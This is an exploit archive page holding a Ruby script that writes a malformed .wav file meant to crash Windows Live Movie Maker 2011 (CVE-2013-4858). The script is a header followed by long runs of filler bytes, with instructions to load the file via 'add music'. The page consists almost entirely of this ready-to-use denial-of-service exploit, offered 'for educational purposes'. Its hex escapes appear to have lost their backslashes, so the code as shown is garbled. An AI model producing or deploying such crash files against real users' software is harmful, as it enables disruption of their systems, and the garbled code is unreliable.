Home / exploits Windows Live Movie Maker 2011 Denial Of Service
Posted on 26 December 2013
#!/usr/bin/env ruby #Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit #Version: Version 2011 (Build 15.4.53508.1109) #Tested on: Windows 7 Professional 32-bit SP1 #E-Mail: OsandaJayathissa@gmail.com #Exploit-Author: Osanda Malith Jayathissa #Video: https://www.youtube.com/watch?v=SBJYzSNdY6k # /! Auhor is not responsible for any damage you cause # Use this material for educational purposes only #This is just a simple crash not an exploitable bug #Twitter: @OsandaMalith #Date: 25 Decemeber 2013 #CVE: 2013-4858 begin dos =( "x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01"+ "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E"+ "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22"+ "x40x4fx73x61x6ex64x61x4dx61x6cx69x74x68x00x00x00"+ "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x74x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"+ "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41") file = open("WindowsMovieMaker.wav","w") file.write(dos) file.close() puts "[+] Exploit created >> WindowsMovieMaker.wav" puts "[*] Open any image and Click add music and add our payload" puts "[~] by Osanda Malith" end #EOF
